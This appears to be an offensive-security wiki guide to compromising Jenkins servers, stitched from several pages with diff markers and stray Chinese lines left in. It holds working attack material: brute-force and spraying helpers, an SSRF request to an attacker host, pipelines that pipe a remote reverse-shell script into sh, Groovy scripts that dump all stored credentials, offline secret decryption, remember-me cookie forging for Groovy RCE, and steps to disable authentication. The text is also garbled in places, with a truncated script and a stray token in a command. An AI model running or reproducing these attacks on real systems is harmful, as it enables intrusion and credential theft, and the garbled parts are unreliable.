## Basic Information
Jenkins is a tool that offers a straightforward method for establishing a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **programming languages** and source code repositories using pipelines. Furthermore, it automates various routine development tasks. While Jenkins doesn't eliminate the **need to create scripts for individual steps**, it does provide a faster and more robust way to integrate the entire sequence of build, test, and deployment tools than one can easily construct manually.
{{#ref}}
basic-jenkins-information.md
{{#endref}}
## Unauthenticated Enumeration
In order to search for interesting Jenkins pages without authentication (like _/people_ or _/asynchPeople_, which list the current users) you can use:
```
msf> use auxiliary/scanner/http/jenkins_enum
```
Check if you can execute commands without needing authentication:
```
msf> use auxiliary/scanner/http/jenkins_command
```
Without credentials you can look inside the _**/asynchPeople/**_ path or _**/securityRealm/user/admin/search/index?q=**_ for **usernames**.
You may be able to get the Jenkins version from the path _**/oops**_ or _**/error**_.
![](<../../images/image (146).png>)
### Known Vulnerabilities
{{#ref}}
https://github.com/gquere/pwn_jenkins
{{#endref}}
## Login
In the basic information you can check **all the ways to login inside Jenkins**:
{{#ref}}
basic-jenkins-information.md
{{#endref}}
### Register
You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.**
### **SSO Login**
Also, if **SSO** **functionality**/**plugins** are present, you should attempt to **log in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).
### Bruteforce
**Jenkins** lacks **password policy** and **username brute-force mitigation**. It's essential to **brute-force** users since **weak passwords** or **usernames as passwords** may be in use, even **reversed usernames as passwords**.
```
msf> use auxiliary/scanner/http/jenkins_login
```
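Since password-equals-username variants are the usual first guesses against a target without a password policy, a tiny (entirely illustrative) wordlist generator for such a spray might look like:

```python
def candidates(user: str) -> list[str]:
    """Common weak-password guesses derived from a username."""
    return [user, user[::-1], user.capitalize(), user + "123"]

# Feed these to the brute-force tool of choice; Jenkins itself
# applies no lockout, but external auth realms (LDAP etc.) might.
print(candidates("alice"))  # → ['alice', 'ecila', 'Alice', 'alice123']
```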
### Password spraying
Use [this python script](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray).
### IP Whitelisting Bypass
Many organizations combine **SaaS-based source control management (SCM) systems** such as GitHub or GitLab with an **internal, self-hosted CI** solution like Jenkins or TeamCity. This setup allows CI systems to **receive webhook events from SaaS source control vendors**, primarily for triggering pipeline jobs.
To achieve this, organizations **whitelist** the **IP ranges** of the **SCM platforms**, permitting them to access the **internal CI system** via **webhooks**. However, it's important to note that **anyone** can create an **account** on GitHub or GitLab and configure it to **trigger a webhook**, potentially sending requests to the **internal CI system**.
Check: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/)
## Internal Jenkins Abuses
In these scenarios we are going to suppose you have a valid account to access Jenkins.
> [!WARNING]
> Depending on the **Authorization** mechanism configured in Jenkins and the permission of the compromised user you **might be able or not to perform the following attacks.**
For more information check the basic information:
{{#ref}}
basic-jenkins-information.md
@@ -81,49 +87,35 @@ basic-jenkins-information.md
### Listing users
If you have accessed Jenkins you can list other registered users in [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/)
### Dumping builds to find cleartext secrets
Use [this script](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets.
```bash
python3 jenkins_dump_builds.py -u alice -p alice http://127.0.0.1:8080/ -o build_dumps
cd build_dumps
gitleaks detect --no-git -v
```
### FormValidation/TestConnection endpoints (CSRF to SSRF/credential theft)
Some plugins expose Jelly `validateButton`/`test connection` handlers under paths like `/descriptorByName/<Class>/testConnection`. When a handler **doesn't enforce POST or permission checks**, you can:
- Switch POST to GET and drop the Crumb to bypass CSRF checks.
- Trigger the handler as a low-privileged/anonymous user if no `Jenkins.ADMINISTER` check is present.
- CSRF an admin and swap the host/URL parameters to exfiltrate credentials or trigger outbound calls.
- Use response errors (e.g. `ConnectException`) as an SSRF/port-scan oracle.
Example GET (no Crumb) turning a validation call into SSRF/credential exfiltration:
```http
GET /descriptorByName/jenkins.plugins.openstack.compute.JCloudsCloud/testConnection?endPointUrl=http://attacker:4444/&credentialId=openstack HTTP/1.1
Host: jenkins.local:8080
```
If the plugin reuses stored creds, Jenkins will attempt to authenticate to `attacker:4444` and may leak identifiers or errors in the response. See: https://www.nccgroup.com/research-blog/story-of-a-hundred-vulnerable-jenkins-plugins/
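Probe URLs like the one above can be generated for arbitrary internal targets; this helper (endpoint path and `credentialId` copied from the example above, target values hypothetical) just assembles the query string:

```python
import urllib.parse

# Vulnerable handler path from the example request above.
ENDPOINT = "/descriptorByName/jenkins.plugins.openstack.compute.JCloudsCloud/testConnection"

def probe_url(jenkins: str, target: str, cred_id: str = "openstack") -> str:
    """Build a GET URL that coerces Jenkins into connecting to `target`."""
    qs = urllib.parse.urlencode({"endPointUrl": target, "credentialId": cred_id})
    return f"{jenkins}{ENDPOINT}?{qs}"

# Comparing error types in the responses (connection refused vs timeout)
# distinguishes closed, open, and filtered internal ports.
print(probe_url("http://jenkins.local:8080", "http://10.0.0.5:443/"))
```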
### **Stealing SSH Credentials**
If the compromised user has **enough privileges to create/modify a new Jenkins node** and SSH credentials are already stored to access other nodes, he could **steal those credentials** by creating/modifying a node and **setting a host that will record the credentials** without verifying the host key:
![](<../../images/image (218).png>)
You will usually find Jenkins ssh credentials in a **global provider** (`/credentials/`), so you can also dump them as you would dump any other secret. More information in the [**Dumping secrets section**](#dumping-secrets).
### **RCE in Jenkins**
Getting a **shell in the Jenkins server** gives the attacker the opportunity to leak all the **secrets** and **env variables** and to **exploit other machines** located in the same network or even **gather cloud credentials**.
默认情况下Jenkins 会以 SYSTEM 运行。因此,攻破它会赋予攻击者 SYSTEM 权限。
By default, Jenkins will **run as SYSTEM**. So, compromising it will give the attacker **SYSTEM privileges**.
### **RCE Creating/Modifying a project**
Creating/Modifying a project is a way to obtain RCE over the Jenkins server:
{{#ref}}
jenkins-rce-creating-modifying-project.md
@@ -131,7 +123,7 @@ jenkins-rce-creating-modifying-project.md
### **RCE Execute Groovy script**
You can also obtain RCE by executing a Groovy script, which might be stealthier than creating a new project:
{{#ref}}
jenkins-rce-with-groovy-script.md
@@ -139,7 +131,7 @@ jenkins-rce-with-groovy-script.md
### RCE Creating/Modifying Pipeline
You can also get **RCE by creating/modifying a pipeline**:
{{#ref}}
jenkins-rce-creating-modifying-pipeline.md
@@ -147,161 +139,173 @@ jenkins-rce-creating-modifying-pipeline.md
## Pipeline Exploitation
exploit pipelines,你仍然需要访问 Jenkins
To exploit pipelines you still need to have access to Jenkins.
### Build Pipelines
**Pipelines** can also be used as the **build mechanism in projects**; in that case a **file inside the repository** containing the pipeline syntax can be configured. By default `/Jenkinsfile` is used:
![](<../../images/image (127).png>)
It's also possible to **store pipeline configuration files in other places** (in other repositories for example) with the goal of **separating** the repository **access** and the pipeline access.
If an attacker has **write access over that file** they will be able to **modify** it and **potentially trigger** the pipeline without even having access to Jenkins.\
It's possible that the attacker will need to **bypass some branch protections** (depending on the platform and the user privileges, they could be bypassed or not).
The most common triggers to execute a custom pipeline are:
- **Pull request** to the main branch (or potentially to other branches)
- **Push to the main branch** (or potentially to other branches)
- **Update the main branch** and wait until it's executed somehow
> [!NOTE]
> If you are an **external user** you shouldn't expect to create a **PR to the main branch** of the repo of **other user/organization** and **trigger the pipeline**... but if it's **bad configured** you could fully **compromise companies just by exploiting this**.
### Pipeline RCE
In the previous RCE section a technique to [**get RCE modifying a pipeline**](#rce-creating-modifying-pipeline) was already indicated.
### Checking Env variables
It's possible to declare **clear text env variables** for the whole pipeline or for specific stages. These env variables **shouldn't contain sensitive info**, but an attacker could always **check all the pipeline** configurations/Jenkinsfiles:
```bash
pipeline {
    agent {label 'built-in'}
    environment {
        GENERIC_ENV_VAR = "Test pipeline ENV variables."
    }

    stages {
        stage("Build") {
            environment {
                STAGE_ENV_VAR = "Test stage ENV variables."
            }
            steps {
```
### Dumping secrets
For information about how secrets are usually treated by Jenkins, check out the basic information:
{{#ref}}
basic-jenkins-information.md
{{#endref}}
Credentials can be **scoped to global providers** (`/credentials/`) or to **specific projects** (`/job/<project-name>/configure`). Therefore, in order to exfiltrate all of them you need to **compromise at least all the projects** that contain secrets and execute custom/poisoned pipelines.
There is another problem: in order to get a **secret inside the env** of a pipeline you need to **know the name and type of the secret**. For example, if you try to **load** a **`usernamePassword`** **secret** as a **`string`** **secret** you will get this **error**:
```
ERROR: Credentials 'flag2' is of type 'Username with password' where 'org.jenkinsci.plugins.plaincredentials.StringCredentials' was expected
```
Here you have the way to load some common secret types:
```bash
withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) {
    sh '''
    env #Search for USERNAME and PASS
    '''
}

withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) {
    sh '''
    env #Search for SECRET
    '''
}

withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) {
    sh '''
    env # Search for USERPASS
    '''
}

# You can also load multiple env variables at once
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
                 string(credentialsId: 'slack-url', variable: 'SLACK_URL')]) {
    sh '''
    env
    '''
}
```
At the end of this page you can **find all the credential types**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
> [!WARNING]
> The best way to **dump all the secrets at once** is by **compromising** the **Jenkins** machine (running a reverse shell in the **built-in node** for example) and then **leaking** the **master keys** and the **encrypted secrets** and decrypting them offline.\
> More on how to do this in the [Nodes & Agents section](#nodes-and-agents) and in the [Post Exploitation section](#post-exploitation).
### Triggers
From [the docs](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): The `triggers` directive defines the **automated ways in which the Pipeline should be re-triggered**. For Pipelines which are integrated with a source such as GitHub or BitBucket, `triggers` may not be necessary as webhooks-based integration will likely already be present. The triggers currently available are `cron`, `pollSCM` and `upstream`.
Cron example:
```bash
triggers { cron('H */4 * * 1-5') }
```
Check **other examples in the docs**.
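For reference, the other two trigger types look roughly like this (the job name and polling interval are made up for illustration):

```bash
triggers { pollSCM('H/15 * * * *') }   # poll the SCM roughly every 15 minutes
triggers { upstream(upstreamProjects: 'jobA', threshold: hudson.model.Result.SUCCESS) }
```

From an attacker's perspective, `upstream` is interesting because compromising one job can transitively trigger downstream pipelines.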
### Nodes & Agents
A **Jenkins instance** might have **different agents running in different machines**. From an attacker's perspective, access to different machines means **different potential cloud credentials** to steal or **different network access** that could be abused to exploit other machines.
For more information check the basic information:
{{#ref}}
basic-jenkins-information.md
{{#endref}}
You can enumerate the **configured nodes** in `/computer/`; you will usually find the **`Built-In Node`** (which is the node running Jenkins) and potentially more:
![](<../../images/image (249).png>)
It is **especially interesting to compromise the Built-In node** because it contains sensitive Jenkins information.
To indicate you want to **run** the **pipeline** in the **built-in Jenkins node** you can specify inside the pipeline the following config:
```bash
pipeline {
    agent {label 'built-in'}
```
### Complete example
Pipeline in an specific agent, with a cron trigger, with pipeline and stage env variables, loading 2 variables in a step and sending a reverse shell:
```bash
pipeline {
    agent {label 'built-in'}
    triggers { cron('H */4 * * 1-5') }
    environment {
        GENERIC_ENV_VAR = "Test pipeline ENV variables."
    }

    stages {
        stage("Build") {
            environment {
                STAGE_ENV_VAR = "Test stage ENV variables."
            }
            steps {
                withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
                    string(credentialsId: 'slack-url', variable: 'SLACK_URL')]) {
                    sh '''
                    curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
                    '''
                }
            }
        }
    }

    post {
        always {
            cleanWs()
        }
    }
}
```
## Arbitrary File Read to RCE
{{#ref}}
@@ -325,37 +329,40 @@ jenkins-rce-creating-modifying-pipeline.md
## Post Exploitation
### Metasploit
```
msf> post/multi/gather/jenkins_gather
```
### Jenkins Secrets
You can list the secrets accessing `/credentials/` if you have enough permissions. Note that this will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
If you can **see the configuration of each project**, you can also see in there the **names of the credentials (secrets)** being used to access the repository and **other credentials of the project**.
![](<../../images/image (180).png>)
#### From Groovy
{{#ref}}
jenkins-dumping-secrets-from-groovy.md
{{#endref}}
#### From disk
These files are needed to **decrypt Jenkins secrets**:
- secrets/master.key
- secrets/hudson.util.Secret
Such **secrets can usually be found in**:
- credentials.xml
- jobs/.../build.xml
- jobs/.../config.xml
Here's a regex to find them:
```bash
# Find the secrets
grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
grep -lre "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
# Secret example
credentials.xml: <secret>{AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==}</secret>
```
#### Decrypt Jenkins secrets offline
If you have dumped the **needed passwords to decrypt the secrets**, use [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **to decrypt those secrets**.
```bash
python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
06165DF2-C047-4402-8CAB-1C8EC526C115
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAt985Hbb8KfIImS6dZlVG6swiotCiIlg/P7aME9PvZNUgg2Iyf2FT
```
#### Decrypt Jenkins secrets from Groovy
```bash
println(hudson.util.Secret.decrypt("{...}"))
```
### Create new admin user
1. Access the Jenkins config.xml file in `/var/lib/jenkins/config.xml` or `C:\Program Files (x86)\Jenkins\`
2. Search for `<useSecurity>true</useSecurity>` and change **`true`** to **`false`**.
1. `sed -i -e 's/<useSecurity>true</<useSecurity>false</g' config.xml`
3. **Restart** the **Jenkins** server: `service jenkins restart`
4. Now go to the Jenkins portal again and **Jenkins will not ask for any credentials** this time. Navigate to "**Manage Jenkins**" to set the **administrator password again**.
5. **Enable** the **security** again by changing settings back to `<useSecurity>true</useSecurity>` and **restart Jenkins again**.
## References
- [https://github.com/gquere/pwn_jenkins](https://github.com/gquere/pwn_jenkins)
- [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/)
@@ -398,3 +410,6 @@ println(hudson.util.Secret.decrypt("{...}"))
- [https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3](https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3)
{{#include ../../banners/hacktricks-training.md}}

### Username + Password
The most common way to log in to Jenkins is with a username and a password.
### Cookie
If an **authorized cookie gets stolen**, it can be used to access that user's session. The cookie is usually called `JSESSIONID.*`. (A user can terminate all of his sessions, but he would first need to find out that a cookie was stolen.)
### SSO/Plugins
Jenkins can be configured using plugins to be **accessible via third party SSO**.
### Tokens
**Users can generate tokens** to give access to applications to impersonate them via CLI or REST API.
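The token is sent as the password of HTTP Basic authentication against the REST API. A minimal sketch (the user name, token value and `JENKINS_URL` below are made-up placeholders, not values from this document):

```python
import base64

# Hypothetical user + API token (a real one is generated under /me/configure)
user, token = "someuser", "11aabb"

# Jenkins API tokens are used as the Basic-auth password
auth = base64.b64encode(f"{user}:{token}".encode()).decode()
print(f"Authorization: Basic {auth}")
# e.g.: curl -H "Authorization: Basic <auth>" "$JENKINS_URL/api/json"
# or simply: curl -u "someuser:11aabb" "$JENKINS_URL/api/json"
```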
### SSH Keys
This component provides a built-in SSH server for Jenkins. It's an alternative interface to the [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), and commands can be invoked this way using any SSH client. (From the [docs](https://plugins.jenkins.io/sshd/))
## Authorization
`/configureSecurity` 中可以 **配置 Jenkins 的授权方法**。有几种选项:
In `/configureSecurity` it's possible to **configure the authorization method of Jenkins**. There are several options:
- **Anyone can do anything**: Even anonymous access can administrate the server
- **Legacy mode**: Same as Jenkins <1.164. If you have the **"admin" role**, you'll be granted **full control** over the system, and **otherwise** (including **anonymous** users) you'll have **read** access.
- **Logged-in users can do anything**: In this mode, every **logged-in user gets full control** of Jenkins. The only user who won't have full control is **anonymous user**, who only gets **read access**.
- **Matrix-based security**: You can configure **who can do what** in a table. Each **column** represents a **permission**. Each **row** **represents** a **user or a group/role.** This includes a special user '**anonymous**', which represents **unauthenticated users**, as well as '**authenticated**', which represents **all authenticated users**.
![](<../../images/image (149).png>)
- **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based security**" that allows additional ACL matrix to be **defined for each project separately.**
- **Role-Based Strategy:** Enables defining authorizations using a **role-based strategy**. Manage the roles in `/role-strategy`.
## **Security Realm**
`/configureSecurity` 中可以 **配置 security realm** 默认情况下 Jenkins 支持几种不同的 Security Realms
In `/configureSecurity` it's possible to **configure the security realm.** By default Jenkins includes support for a few different Security Realms:
- **Delegate to servlet container**: For **delegating authentication to the servlet container running the Jenkins controller**, such as [Jetty](https://www.eclipse.org/jetty/).
- **Jenkins own user database:** Use **Jenkins's own built-in user data store** for authentication instead of delegating to an external system. This is enabled by default.
- **LDAP**: Delegate all authentication to a configured LDAP server, including both users and groups.
- **Unix user/group database**: **Delegates the authentication to the underlying Unix** OS-level user database on the Jenkins controller. This mode will also allow re-use of Unix groups for authorization.
Plugins can provide additional security realms which may be useful for incorporating Jenkins into existing identity systems, such as:
- [Active Directory](https://plugins.jenkins.io/active-directory)
- [GitHub Authentication](https://plugins.jenkins.io/github-oauth)
Definitions from the [docs](https://www.jenkins.io/doc/book/managing/nodes/):
**Nodes** are the **machines** on which build **agents run**. Jenkins monitors each attached node for disk space, free temp space, free swap, clock time/sync and response time. A node is taken offline if any of these values go outside the configured threshold.
**Agents** **manage** the **task execution** on behalf of the Jenkins controller by **using executors**. An agent can use any operating system that supports Java. Tools required for builds and tests are installed on the node where the agent runs; they can **be installed directly or in a container** (Docker or Kubernetes). Each **agent is effectively a process with its own PID** on the host machine.
An **executor** is a **slot for execution of tasks**; effectively, it is **a thread in the agent**. The **number of executors** on a node defines the number of **concurrent tasks** that can be executed on that node at one time. In other words, this determines the **number of concurrent Pipeline `stages`** that can execute on that node at one time.
## Jenkins Secrets
### Encryption of Secrets and Credentials
Definition from the [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins uses **AES to encrypt and protect secrets**, credentials, and their respective encryption keys. These encryption keys are stored in `$JENKINS_HOME/secrets/` along with the master key used to protect said keys. This directory should be configured so that only the operating system user the Jenkins controller is running as has read and write access to this directory (i.e., a `chmod` value of `0700` or using appropriate file attributes). The **master key** (sometimes referred to as a "key encryption key" in crypto jargon) is **stored _unencrypted_** on the Jenkins controller filesystem in **`$JENKINS_HOME/secrets/master.key`**, which does not protect against attackers with direct access to that file. Most users and developers will use these encryption keys indirectly via either the [Secret](https://javadoc.jenkins.io/byShortName/Secret) API for encrypting generic secret data or through the credentials API. For the cryptocurious, Jenkins uses AES in cipher block chaining (CBC) mode with PKCS#5 padding and random IVs to encrypt instances of [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) which are stored in `$JENKINS_HOME/secrets/` with a filename corresponding to their `CryptoConfidentialKey` id. Common key ids include:
- `hudson.util.Secret`: used for generic secrets;
- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: used for some credentials types;
- `jenkins.model.Jenkins.crumbSalt`: used by the [CSRF protection mechanism](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); and
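The key-derivation step described above can be sketched in a few lines of Python; this mirrors what offline decryption tools do, and the sample key material below is made up:

```python
import hashlib

MAGIC = b"::::MAGIC::::"

def to_aes128_key(master_key: bytes) -> bytes:
    # Jenkins hashes the content of secrets/master.key with SHA-256
    # and keeps the first 16 bytes as the AES-128 key-encryption key
    return hashlib.sha256(master_key).digest()[:16]

# Decrypting e.g. secrets/hudson.util.Secret with this derived key (the
# recovered plaintext is expected to end in MAGIC) is what offline tools
# such as jenkins_offline_decrypt.py implement on top of this derivation.
print(len(to_aes128_key(b"sample master.key content")))  # → 16
```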
### Credentials Access
Credentials can be **scoped to global providers** (`/credentials/`) that can be accessed by any project configured, or can be scoped to **specific projects** (`/job/<project-name>/configure`) and therefore only accessible from the specific project.
According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/): Credentials that are in scope are made available to the pipeline without limitation. To **prevent accidental exposure in the build log**, credentials are **masked** from regular output, so an invocation of `env` (Linux) or `set` (Windows), or programs printing their environment or parameters would **not reveal them in the build log** to users who would not otherwise have access to the credentials.
**That is why, in order to exfiltrate the credentials, an attacker needs to, for example, base64-encode them.**
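Masking works by pattern-matching the literal secret value in the build log, so any reversible transformation slips through. A local illustration (the secret value here is obviously made up):

```python
import base64

secret = "s3cr3t"  # stands in for a credential value Jenkins would mask
encoded = base64.b64encode(secret.encode()).decode()
print(encoded)  # czNjcjN0 – no longer matches the literal value, so it is not masked
# the attacker then decodes it offline:
print(base64.b64decode(encoded).decode())
```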
### Secrets in plugin/job configs on disk
Don't assume that secrets only live in `credentials.xml`. Many plugins persist secrets in **their own global XML** under `$JENKINS_HOME/*.xml`, or per job in `$JENKINS_HOME/jobs/<JOB>/config.xml`, sometimes even in cleartext (UI masking does not guarantee encrypted storage). If you gain filesystem read access, enumerate these XML files and search for obvious secret tags.
```bash
# Global plugin configs
ls -l /var/lib/jenkins/*.xml
grep -R "password\|token\|SecretKey\|credentialId" /var/lib/jenkins/*.xml
# Per-job configs
find /var/lib/jenkins/jobs -maxdepth 2 -name config.xml -print -exec grep -H "password\|token\|SecretKey" {} \;
```
## References
- [https://www.jenkins.io/doc/book/security/managing-security/](https://www.jenkins.io/doc/book/security/managing-security/)
- [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
- [https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery)
- [https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials)
- [https://www.nccgroup.com/research-blog/story-of-a-hundred-vulnerable-jenkins-plugins/](https://www.nccgroup.com/research-blog/story-of-a-hundred-vulnerable-jenkins-plugins/)
{{#include ../../banners/hacktricks-training.md}}

{{#include ../../banners/hacktricks-training.md}}
In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/)
This is an AI-generated summary of the part of the post where the crafting of an arbitrary cookie is abused, together with a local file read, to get RCE (until I have time to create a summary on my own):
### Attack Prerequisites
- **Feature Requirement:** "Remember me" must be enabled (default setting).
- **Access Levels:** Attacker needs Overall/Read permissions.
- **Secret Access:** Ability to read both binary and textual content from key files.
### Detailed Exploitation Process
#### Step 1: Data Collection
**User Information Retrieval**
- Access user configuration and secrets from `$JENKINS_HOME/users/*.xml` for each user to gather:
- **Username**
- **User seed**
- **Timestamp**
- **Password hash**
**Secret Key Extraction**
- Extract cryptographic keys used for signing the cookie:
- **Secret Key:** `$JENKINS_HOME/secret.key`
- **Master Key:** `$JENKINS_HOME/secrets/master.key`
- **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac`
#### Step 2: Cookie Forging
**Token Preparation**
- **Calculate Token Expiry Time:**
```javascript
tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time
```
- **Concatenate Data for Token:**
```javascript
token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey
```
**MAC Key Decryption**
- **Decrypt MAC Key File:**
```javascript
key = toAes128Key(masterKey) // Convert master key to AES128 key format
decrypted = AES.decrypt(macFile, key) // Decrypt the .mac file
if not decrypted.hasSuffix("::::MAGIC::::")
return ERROR;
macKey = decrypted.withoutSuffix("::::MAGIC::::")
```
**Signature Computation**
- **Compute HMAC SHA256:**
```javascript
mac = HmacSHA256(token, macKey) // Compute HMAC using the token and MAC key
tokenSignature = bytesToHexString(mac) // Convert the MAC to a hexadecimal string
```
**Cookie Encoding**
- **Generate Final Cookie:**
```javascript
cookie = base64.encode(
username + ":" + tokenExpiryTime + ":" + tokenSignature
) // Base64 encode the cookie data
```
#### Step 3: Code Execution
**Session Authentication**
- **Fetch CSRF and Session Tokens:**
- Make a request to `/crumbIssuer/api/json` to obtain `Jenkins-Crumb`.
- Capture `JSESSIONID` from the response, which will be used in conjunction with the remember-me cookie.
**Command Execution Request**
- **Send a POST Request with Groovy Script:**
```bash
curl -X POST "$JENKINS_URL/scriptText" \
--cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
--header "Jenkins-Crumb: $CRUMB" \
--header "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "script=$SCRIPT"
```
- Groovy script can be used to execute system-level commands or other operations within the Jenkins environment.
The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code.
{{#include ../../banners/hacktricks-training.md}}

# Jenkins Dumping Secrets from Groovy
{{#include ../../banners/hacktricks-training.md}}
> [!WARNING]
> Note that these scripts will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
You can **dump all the secrets from the Groovy Script console** in `/script` running this code
```java
// From https://www.dennisotugo.com/how-to-view-all-jenkins-secrets-credentials/
import jenkins.model.*
showRow("something else", it.id, '', '', '')
return
```
#### or this one:
```java
import java.nio.charset.StandardCharsets;
def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
com.cloudbees.plugins.credentials.Credentials.class
)
for (c in creds) {
println(c.id)
if (c.properties.description) {
println(" description: " + c.description)
}
if (c.properties.username) {
println(" username: " + c.username)
}
if (c.properties.password) {
println(" password: " + c.password)
}
if (c.properties.passphrase) {
println(" passphrase: " + c.passphrase)
}
if (c.properties.secret) {
println(" secret: " + c.secret)
}
if (c.properties.secretBytes) {
println(" secretBytes: ")
println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8))
println("")
}
if (c.properties.privateKeySource) {
println(" privateKey: " + c.getPrivateKey())
}
if (c.properties.apiToken) {
println(" apiToken: " + c.apiToken)
}
if (c.properties.token) {
println(" token: " + c.token)
}
println("")
}
```
{{#include ../../banners/hacktricks-training.md}}

# Jenkins RCE Creating/Modifying Pipeline
{{#include ../../banners/hacktricks-training.md}}
## Creating a new Pipeline
In "New Item" (accessible in `/view/all/newJob`) select **Pipeline:**
![](<../../images/image (235).png>)
**Pipeline 部分** 中写入 **reverse shell**
In the **Pipeline section** write the **reverse shell**:
![](<../../images/image (285).png>)
```groovy
pipeline {
    agent any

    stages {
        stage('Hello') {
            steps {
                sh '''
                curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
                '''
            }
        }
    }
}
```
Finally click on **Save**, and **Build Now** and the pipeline will be executed:
![](<../../images/image (228).png>)
## Modifying a Pipeline
If you can access the configuration file of a configured pipeline, you can simply **modify it, appending your reverse shell**, and then execute it or wait until it gets executed.
{{#include ../../banners/hacktricks-training.md}}

# Jenkins RCE Creating/Modifying Project
{{#include ../../banners/hacktricks-training.md}}
## Creating a Project
This method is very noisy because you have to create a whole new project (obviously this will only work if your user is allowed to create a new project).
1. **Create a new project** (Freestyle project) clicking "New Item" or in `/view/all/newJob`
2. Inside the **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead of _powershell_.
3. Click **Build now**
1. If **Build now** button doesn't appear, you can still go to **configure** --> **Build Triggers** --> `Build periodically` and set a cron of `* * * * *`
2. Instead of using cron, you can use the "**Trigger builds remotely**" config, where you just need to set the API token name used to trigger the job. Then go to your user profile and **generate an API token** (name this API token the same as the token name you set to trigger the job). Finally, trigger the job with: **`curl <username>:<api_token>@<jenkins_url>/job/<job_name>/build?token=<api_token_name>`**
![](<../../images/image (165).png>)
## Modifying a Project
Go to the projects and check **if you can configure any** of them (look for the "Configure button"):
![](<../../images/image (265).png>)
If you **cannot see** any **configuration button** then you probably **cannot configure** it (but check all projects, as you might be able to configure some of them and not others).
Or **try to access the path** `/job/<proj-name>/configure` or `/me/my-views/view/all/job/<proj-name>/configure` in each project (example: `/job/Project0/configure` or `/me/my-views/view/all/job/Project0/configure`).
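A small helper to enumerate both candidate URLs per project can make this systematic; the base URL and project names below are assumptions, and the actual authenticated probing is left as a comment:

```python
def configure_urls(base: str, project: str) -> list[str]:
    # Both paths may expose the job configuration page
    return [
        f"{base}/job/{project}/configure",
        f"{base}/me/my-views/view/all/job/{project}/configure",
    ]

for project in ["Project0", "Project1"]:  # hypothetical job names
    for url in configure_urls("http://jenkins.local:8080", project):
        print(url)
        # e.g.: curl -s -o /dev/null -w '%{http_code}' -u user:token "$url"
        # an HTTP 200 here suggests you can configure the job
```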
## Execution
If you are allowed to configure the project you can **make it execute commands when a build is successful**:
![](<../../images/image (98).png>)
Click on **Save** and **build** the project and your **command will be executed**.\
If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.
{{#include ../../banners/hacktricks-training.md}}

## Jenkins RCE with Groovy Script
